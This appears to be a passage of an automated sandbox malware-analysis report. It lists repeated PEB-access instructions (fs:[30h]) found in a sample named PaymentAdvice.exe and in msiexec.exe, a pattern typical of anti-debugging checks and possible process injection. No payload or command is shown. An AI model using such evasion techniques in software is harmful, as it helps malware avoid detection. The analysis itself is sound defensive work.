          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A21DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AA8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A7A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A03D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A24D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A33D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A73540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A17D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A38EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AAFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AAFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A28E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A07E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00ABAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A08794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04673D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04657D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708D34 mov eax, dword ptr fs:[00000030h]
